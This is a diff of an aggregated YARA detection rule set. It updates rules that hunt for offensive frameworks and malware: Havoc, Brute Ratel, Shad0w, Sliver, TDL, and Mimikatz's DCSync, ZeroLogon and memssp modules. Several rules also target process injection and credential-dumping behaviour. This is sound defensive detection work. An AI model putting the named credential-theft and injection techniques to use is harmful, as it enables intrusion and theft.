+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "595cabd508ee60c5606f965eb9a290ae21ea32af0f56e213f6ce2d2e35dc4e11"
+		logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		vendor = "Huntress Labs"
+		vendor = "Huntress Research"
 
 	strings:
-		$qakbot_hashing = {0f b6 04 39 33 f0 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 41 3b ca}
+		$dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef}
+		$shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4}
 
 	condition:
-		any of them
+		( any of them ) and ( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 or uint16( 0 ) == 0x4856 )
 }
 rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE
 {
@@ -173584,35 +173530,36 @@ rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 ) and ( 2 of ( $hash* ) )
 }
-rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "embee_research @ HuntressLabs"
-		id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c"
-		date = "2022-10-11"
+		description = "Yara rule to detect GraceWireLoader via usage of Stack Strings"
+		author = "Embee_Research @ Huntress"
+		id = "63d0cd9f-34f7-5ec4-8061-66d36859bd0c"
+		date = "2022-12-12"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_gracewire_loader_dec_2022.yar#L2-L24"
 		license_url = "N/A"
-		logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3"
+		logic_hash = "168af6d24c0646e90717f27e6ba4a18da8e92950ffa7a881243860305037da48"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		vendor = "Huntress Research"
 
 	strings:
-		$dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef}
-		$shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4}
+		$ZwAllocateVirtualMemory = {c6 44 24 48 5a c6 44 24 49 77 c6 44 24 4a 41 c6 44 24 4b 6c c6 44 24 4c 6c c6 44 24 4d 6f c6 44 24 4e 63 c6 44 24 4f 61 c6 44 24 50 74 c6 44 24 51 65 c6 44 24 52 56 c6 44 24 53 69 c6 44 24 54 72 c6 44 24 55 74 c6 44 24 56 75 c6 44 24 57 61 c6 44 24 58 6c c6 44 24 59 4d c6 44 24 5a 65 c6 44 24 5b 6d c6 44 24 5c 6f}
+		$LdrGetProcedureAddress = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 47 c6 44 24 54 65 c6 44 24 55 74 c6 44 24 56 50 c6 44 24 57 72 c6 44 24 58 6f c6 44 24 59 63 c6 44 24 5a 65 c6 44 24 5b 64 c6 44 24 5c 75 c6 44 24 5d 72 c6 44 24 5e 65 c6 44 24 5f 41 c6 44 24 60 64 c6 44 24 61 64 c6 44 24 62 72 c6 44 24 63 65 c6 44 24 64 73 c6 44 24 65 73 c6 44 24 66 00}
+		$LdrLoadDLL = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 4c c6 44 24 54 6f c6 44 24 55 61 c6 44 24 56 64 c6 44 24 57 44 c6 44 24 58 6c c6 44 24 59 6c}
+		$ZwFreeVirtualMemory = {c6 44 24 30 5a c6 44 24 31 77 c6 44 24 32 46 c6 44 24 33 72 c6 44 24 34 65 c6 44 24 35 65 c6 44 24 36 56 c6 44 24 37 69 c6 44 24 38 72 c6 44 24 39 74 c6 44 24 3a 75 c6 44 24 3b 61 c6 44 24 3c 6c c6 44 24 3d 4d c6 44 24 3e 65 c6 44 24 3f 6d c6 44 24 40 6f c6 44 24 41 72 c6 44 24 42 79}
 
 	condition:
-		( any of them ) and ( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 or uint16( 0 ) == 0x4856 )
+		3 of them
 }
 /*
  * YARA Rule Set
  * Repository Name: AvastTI
  * Repository: https://github.com/avast/ioc
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: e06f1f727a474f65c2ba1b00533398faa49268c6
  * Number of Rules: 33
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -174475,7 +174422,7 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X64
  * YARA Rule Set
  * Repository Name: SBousseaden
  * Repository: https://github.com/sbousseaden/YaraHunts/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 71b27a2a7c57c2aa1877a11d8933167794e2b4fb
  * Number of Rules: 37
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -174485,31 +174432,6 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X64
  *
  * NO LICENSE SET
  */
-rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE
-{
-	meta:
-		description = "Shad0w beacon compressed"
-		author = "SBousseaden"
-		id = "1229e84f-bf6e-5e87-9351-a48cd50397b0"
-		date = "2020-06-16"
-		modified = "2020-06-17"
-		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13"
-		license_url = "N/A"
-		logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09}
-		$s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A}
-		$s3 = "VirtualProtect"
-		$s4 = "GetProcAddress"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
-}
 
 rule SBOUSSEADEN_Maliciousdllgenerator : FILE
 {
@@ -174533,123 +174455,101 @@ rule SBOUSSEADEN_Maliciousdllgenerator : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and $decoder and pe.exports ( "Init" ) and pe.number_of_exports == 2
 }
-rule SBOUSSEADEN_Dcsync_Mimikatz : FILE
+rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE
 {
 	meta:
-		description = "Hunting rule for Mimikatz Implementation of DCSync Attack"
+		description = "Shad0w beacon LdrLoadDll hook"
 		author = "SBousseaden"
-		id = "2d5d5fdb-8a84-5e88-b136-4e3e788c46cd"
-		date = "2020-09-22"
-		modified = "2020-09-22"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_dcsync.yara#L1-L24"
+		id = "f9f75b96-2341-553f-b6ca-28d6cb9b880a"
+		date = "2020-06-06"
+		modified = "2020-06-07"
+		reference = "https://github.com/bats3c/shad0w"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_ldrhook.yara#L1-L13"
 		license_url = "N/A"
-		logic_hash = "436979d794b7b599f2186252c7f233f091100880c2d39008d8bd7f839553fb53"
-		score = 50
+		logic_hash = "28e8ca9eee2377fd816dd3bd29e05f4146cea975e0ba5ec180073e10a49895e0"
+		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$DRS1 = "DRSGetNCChanges"
-		$DRS2 = "DRSReplicaAdd"
-		$DRS3 = "DRSAddEntry"
-		$DRSW1 = "DRSGetNCChanges" wide
-		$DRSW2 = "DRSReplicaAdd" wide
-		$DRSW3 = "DRSAddEntry" wide
-		$rpc1 = {35 42 51 E3 06 4B D1 11 AB 04 00 C0 4F C2 DC D2 04 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02}
-		$rpc2 = {34 05 50 21 18 00 08 00 13 81 20 00 8A 05 70 00 28}
-		$rpc3 = {0B 01 10 00 DC 05 50 21 18 00 08 00 13 21 20 00 2E 06 70 00 28}
-		$rpc4 = {48 06 50 21 18 00 08 00 13 41 20 00 72 06 70 00 28}
-		$rpc5 = {78 03 0B 00 10 00 7C 03 13 20 18 00 A4 03 10 01 20 00 AC 03 70 00 28}
-		$rpc6 = {C0 03 50 21 18 00 08 00 13 01 20 00 74 04 70 00 28}
-		$rpc7 = {8C 06 50 21 18 00 08 00 13 A1 20 00 C6 06 70 00 28}
-		$def1 = "mimikatz"
-		$def2 = "mimikatz" wide
+		$s1 = "LdrLoadD"
+		$s2 = "SetPr"
+		$s3 = "Policy"
+		$s4 = {B8 49 BB DE AD C0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $DRS* ) or all of ( $DRSW* ) ) and all of ( $rpc* ) and not ( any of ( $def* ) )
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE
+rule SBOUSSEADEN_Infinityhook : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
+		description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard"
 		author = "SBousseaden"
-		id = "a2adedef-ba38-599f-b52c-e2156aa5ef98"
-		date = "2020-10-10"
-		modified = "2020-10-10"
-		reference = "https://github.com/hfiref0x/TDL"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9"
+		id = "82f4eef2-fca7-58b1-a85c-3c237f523740"
+		date = "2020-09-07"
+		modified = "2020-07-10"
+		reference = "https://github.com/everdox/InfinityHook"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b"
+		logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1}
-		$shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9}
+		$EtwpDebuggerPattern = {00 2C 08 04 38 0C 00}
+		$SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00}
+		$KVASCODE = {4B 56 41 53 43 4F 44 45}
+		$CKL = "Circular Kernel Context Logger" wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of ( $shc* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SBOUSSEADEN_APT_Xdsspy_Xdupload : FILE
+
+rule SBOUSSEADEN_Gosliver
 {
 	meta:
 		description = "No description has been set in the source file - SBousseaden"
 		author = "SBousseaden"
-		id = "ae38d017-6420-596c-af29-62f15cfe56b8"
-		date = "2020-05-10"
-		modified = "2020-10-05"
-		reference = "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_xdspy_xdupload.yara#L1-L11"
+		id = "eba5043a-ca4d-5c5d-a895-51218b03e59e"
+		date = "2020-10-11"
+		modified = "2020-10-11"
+		reference = "https://github.com/BishopFox/sliver"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9"
 		license_url = "N/A"
-		logic_hash = "648ea81d1b44d8514439683cf2f86a8027f9e1eb64abf76d42347fc2ce9c4e68"
+		logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "cmd.exe /u /c cd /d \"%s\" & dir /a /-c" wide
-		$s2 = "commandC_dll.dll"
-		$s3 = "cmd.exe /u /c del" wide
+		$go = "_cgo_"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $s* )
+		#go> 10 and pe.exports ( "RunSliver" )
 }
-rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE
+rule SBOUSSEADEN_Mimikatz_Kiwikey
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
+		description = "hunt for default mimikatz kiwikey"
 		author = "SBousseaden"
-		id = "c15d5f14-d17f-528b-bf85-e06a5e23518c"
-		date = "2020-10-22"
-		modified = "2020-10-22"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/APT_SLUB_Backdoor.yara#L1-L22"
+		id = "3141e679-6e07-5017-9675-4557fb876ebc"
+		date = "2020-08-08"
+		modified = "2020-08-09"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/kiwikey.yara#L1-L10"
 		license_url = "N/A"
-		hash = "93bb93d87cedb0a99976c18a37d65f816dc904942a0fb39cc177d49372ed54e5"
-		hash = "59e4510b7b15011d67eb2f80484589f7211e67756906a87ce466a7bb68f2095b"
-		hash = "c7788c015244e12e4c8cc69a2b1344d589284c84102c2f1871bbb4f4c32c2936"
-		hash = "6678a5964db74d477b39bd0a8c18adf02844bed8b112c7bcca6984032918bdfb"
-		logic_hash = "aa17dcfde1e2227ff04bda708d4c40c1e1f07b404d2c43582632d83c98d65e83"
-		score = 50
-		quality = 73
-		tags = "FILE"
+		logic_hash = "03745aed838dafad2fc6e190f181141bda31c212af56edb8ba665b86671f8bee"
+		score = 75
+		quality = 75
+		tags = ""
 
 	strings:
-		$s1 = "file_infos" ascii wide
-		$s2 = "%ws\\%u_cmd_out.tmp" ascii wide
-		$s3 = "%ws\\%u_cmd_out.zip" ascii wide
-		$s4 = "[was netstat]" ascii wide
-		$s5 = {63 3A 5C 77 6F 72 6B 2E 76 63 70 6B 67 5C 69 6E 73 74 61 6C 6C 65 64 5C 78 36 34 2D 77 69 6E 64 6F 77 73 2D 73 74 61 74 69 63 5C}
-		$s6 = "LoadFileToMemory" ascii wide
-		$s7 = "setStartupExec" ascii wide
-		$s8 = "%04u-%02u-%02u %02u:%02u:%02u" ascii wide
-		$s9 = "goto del_one" ascii wide
-		$s10 = "goto del_two" ascii wide
+		$A = {60 BA 4F CA C7 44 24 ?? DC 46 6C 7A C7 44 24 ?? 03 3C 17 81 C7 44 24 ?? 94 C0 3D F6}
+		$B = {48 B8 ?? ?? ?? ?? ?? ?? ?? ?? FF D0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		$A and #B > 10
 }
 
 rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE
@@ -174671,209 +174571,28 @@ rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and ( pe.exports ( "Wow64LogInitialize" ) or pe.exports ( "Wow64LogMessageArgList" ) or pe.exports ( "Wow64LogSystemService" ) or pe.exports ( "Wow64LogTerminate" ) )
 }
-rule SBOUSSEADEN_Hunt_Evtmutehook_Memory
-{
-	meta:
-		description = "memory hunt for default wevtsv EtwEventCallback hook pattern to apply to eventlog svchost memory dump"
-		author = "SBousseaden"
-		id = "5326581e-90d9-59b9-8dc5-74df97571600"
-		date = "2020-09-05"
-		modified = "2020-09-05"
-		reference = "https://blog.dylan.codes/pwning-windows-event-logging/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_memory_evtmutehook.yara#L1-L11"
-		license_url = "N/A"
-		logic_hash = "3db66069ed67d90031a6fe071dad4d0200ddd661b263dd2860df026673031e48"
-		score = 50
-		quality = 75
-		tags = ""
-
-	strings:
-		$a = {49 BB ?? ?? ?? ?? ?? ?? ?? ?? 41 FF E3 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3}
-		$b = {48 83 EC 38 4C 8B 0D 65 CB 1A 00 48 8D 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3}
-
-	condition:
-		$a and not $b
-}
-rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE
-{
-	meta:
-		description = "hunt for possible injection with Instrumentation Callback PE"
-		author = "SBousseaden"
-		id = "f450bf71-d848-540e-b700-c046662f1cbc"
-		date = "2020-07-25"
-		modified = "2020-07-25"
-		reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21"
-		license_url = "N/A"
-		logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162"
-		score = 50
-		quality = 71
-		tags = "FILE"
-
-	strings:
-		$mv1 = "MapViewOfFile3" xor
-		$mv2 = "MapViewOfFile3" wide xor
-		$mv3 = "NtMapViewOfSectionEx" xor
-		$mv4 = "NtMapViewOfSectionEx" wide xor
-		$mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3}
-		$spi1 = "NtSetInformationProcess" xor
-		$spi2 = "NtSetInformationProcess" wide xor
-		$spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3}
-		$picb = {BA 28 00 00 00}
-		$ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57}
-		$ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A}
-		$ss3 = {49 89 CA 0F 05 C3}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and $picb and 1 of ( $mv* ) and 1 of ( $spi* ) and 1 of ( $ss* )
-}
-
-rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE
-{
-	meta:
-		description = "broad hunt for any PE exporting ServiceMain API and upx packed"
-		author = "SBousseaden"
-		id = "883691fe-3858-5177-97ca-122ff2ec54af"
-		date = "2019-01-28"
-		modified = "2020-06-05"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13"
-		license_url = "N/A"
-		logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7"
-		score = 65
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$upx1 = {55505830000000}
-		$upx2 = {55505831000000}
-		$upx_sig = "UPX!"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and $upx1 in ( 0 .. 1024 ) and $upx2 in ( 0 .. 1024 ) and $upx_sig in ( 0 .. 1024 ) and pe.exports ( "ServiceMain" )
-}
-
-rule SBOUSSEADEN_Susp_Msoffice_Addins_Wxll : FILE
-{
-	meta:
-		description = "hunt for suspicious MS Office Addins with code injection capabilities"
-		author = "SBousseaden"
-		id = "39d3b2af-f848-51c0-a13b-13c0fe3a79dd"
-		date = "2020-11-10"
-		modified = "2023-03-27"
-		reference = "https://twitter.com/JohnLaTwC/status/1315287078855352326"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_msoffice_addins_wxll.yara#L3-L29"
-		license_url = "N/A"
-		logic_hash = "130a0292b16e934311597d4f91456e6a605477e306a7b1d8171cc4e13794db31"
-		score = 65
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$inj1 = "WriteProcessMemory"
-		$inj2 = "NtWriteVirtualMemory"
-		$inj3 = "RtlMoveMemory"
-		$inj4 = "VirtualAllocEx"
-		$inj5 = "NtAllocateVirtualMemory"
-		$inj6 = "NtUnmapViewOfSection"
-		$inj7 = "VirtualProtect"
-		$inj8 = "NtProtectVirtualMemory"
-		$inj9 = "SetThreadContext"
-		$inj10 = "NtSetContextThread"
-		$inj11 = "ResumeThread"
-		$inj12 = "NtResumeThread"
-		$inj13 = "QueueUserAPC"
-		$inj14 = "NtQueueApcThread"
-		$inj15 = "NtQueueApcThreadEx"
-		$inj16 = "CreateRemoteThread"
-		$inj17 = "NtCreateThreadEx"
-		$inj18 = "RtlCreateUserThread"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "wdAutoOpen" ) or pe.exports ( "xlAutoOpen" ) ) and 3 of ( $inj* )
-}
-rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE
+rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE
 {
 	meta:
-		description = "Shad0w beacon LdrLoadDll hook"
+		description = "No description has been set in the source file - SBousseaden"
 		author = "SBousseaden"
-		id = "f9f75b96-2341-553f-b6ca-28d6cb9b880a"
-		date = "2020-06-06"
-		modified = "2020-06-07"
-		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_ldrhook.yara#L1-L13"
+		id = "a2adedef-ba38-599f-b52c-e2156aa5ef98"
+		date = "2020-10-10"
+		modified = "2020-10-10"
+		reference = "https://github.com/hfiref0x/TDL"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9"
 		license_url = "N/A"
-		logic_hash = "28e8ca9eee2377fd816dd3bd29e05f4146cea975e0ba5ec180073e10a49895e0"
+		logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "LdrLoadD"
-		$s2 = "SetPr"
-		$s3 = "Policy"
-		$s4 = {B8 49 BB DE AD C0}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
-}
-rule SBOUSSEADEN_Mimikatz_Kiwikey
-{
-	meta:
-		description = "hunt for default mimikatz kiwikey"
-		author = "SBousseaden"
-		id = "3141e679-6e07-5017-9675-4557fb876ebc"
-		date = "2020-08-08"
-		modified = "2020-08-09"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/kiwikey.yara#L1-L10"
-		license_url = "N/A"
-		logic_hash = "03745aed838dafad2fc6e190f181141bda31c212af56edb8ba665b86671f8bee"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$A = {60 BA 4F CA C7 44 24 ?? DC 46 6C 7A C7 44 24 ?? 03 3C 17 81 C7 44 24 ?? 94 C0 3D F6}
-		$B = {48 B8 ?? ?? ?? ?? ?? ?? ?? ?? FF D0}
-
-	condition:
-		$A and #B > 10
-}
-rule SBOUSSEADEN_Mimikatz_Memssp_Hookfn
-{
-	meta:
-		description = "hunt for default mimikatz memssp module both ondisk and in memory artifacts"
-		author = "SBousseaden"
-		id = "845827b1-acd4-53af-97fb-43a4fe355fbf"
-		date = "2020-08-26"
-		modified = "2020-08-26"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/mimikatz_memssp_hookfn.yara#L1-L22"
-		license_url = "N/A"
-		logic_hash = "f63f3de05dd4f4f40cda6df67b75e37d7baa82c4b4cafd3ebdca35adfb0b15f8"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {44 30 00 38 00}
-		$s2 = {48 78 00 3A 00}
-		$s3 = {4C 25 00 30 00}
-		$s4 = {50 38 00 78 00}
-		$s5 = {54 5D 00 20 00}
-		$s6 = {58 25 00 77 00}
-		$s7 = {5C 5A 00 5C 00}
-		$s8 = {60 25 00 77 00}
-		$s9 = {64 5A 00 09 00}
-		$s10 = {6C 5A 00 0A 00}
-		$s11 = {68 25 00 77 00}
-		$s12 = {68 25 00 77 00}
-		$s13 = {6C 5A 00 0A 00}
-		$B = {6D 69 6D 69 C7 84 24 8C 00 00 00 6C 73 61 2E C7 84 24 90 00 00 00 6C 6F 67}
+		$shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1}
+		$shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9}
 
 	condition:
-		all of ( $s* ) or $B
+		uint16( 0 ) == 0x5a4d and any of ( $shc* )
 }
 rule SBOUSSEADEN_Mem_Webcreds_Regexp_Xor
 {
@@ -175333,64 +175052,118 @@ rule SBOUSSEADEN_Hunt_Teamviewer_Registry_Pwddump : CVE_2019_18988 FILE
 	condition:
 		any of ( $key* ) and any of ( $iv* ) and 2 of ( $p* ) and filesize < 700KB
 }
-rule SBOUSSEADEN_Cve_2019_1458 : FILE
+rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
+		description = "hunt for possible injection with Instrumentation Callback PE"
 		author = "SBousseaden"
-		id = "7bcbfccb-2db0-5438-9ed1-eee4c92710b6"
-		date = "2020-10-22"
-		modified = "2020-10-23"
-		reference = "https://github.com/unamer/CVE-2019-1458"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_cve_2019_1458.yara#L1-L22"
+		id = "f450bf71-d848-540e-b700-c046662f1cbc"
+		date = "2020-07-25"
+		modified = "2020-07-25"
+		reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "8c5eac6b9fb9f87e0ffb219f0af8f83475799e062ed339da7a0525180292f5f2"
-		score = 75
+		logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162"
+		score = 50
+		quality = 71
+		tags = "FILE"
+
+	strings:
+		$mv1 = "MapViewOfFile3" xor
+		$mv2 = "MapViewOfFile3" wide xor
+		$mv3 = "NtMapViewOfSectionEx" xor
+		$mv4 = "NtMapViewOfSectionEx" wide xor
+		$mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3}
+		$spi1 = "NtSetInformationProcess" xor
+		$spi2 = "NtSetInformationProcess" wide xor
+		$spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3}
+		$picb = {BA 28 00 00 00}
+		$ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57}
+		$ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A}
+		$ss3 = {49 89 CA 0F 05 C3}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and $picb and 1 of ( $mv* ) and 1 of ( $spi* ) and 1 of ( $ss* )
+}
+rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE
+{
+	meta:
+		description = "Generic Hunting rule for Mimikatz Implementation of ZeroLogon PrivEsc Exploit"
+		author = "SBousseaden"
+		id = "0fd32f14-d82d-5af4-b4a2-b21e2325ade8"
+		date = "2020-09-17"
+		modified = "2020-09-17"
+		reference = "https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_zerologon.yar#L1-L19"
+		license_url = "N/A"
+		logic_hash = "5b8d618e8e680acd4e5a9def4e3b56617080dec0c5787c3d6f948489346a6888"
+		score = 50
 		quality = 75
 		tags = "FILE"
 
 	strings:
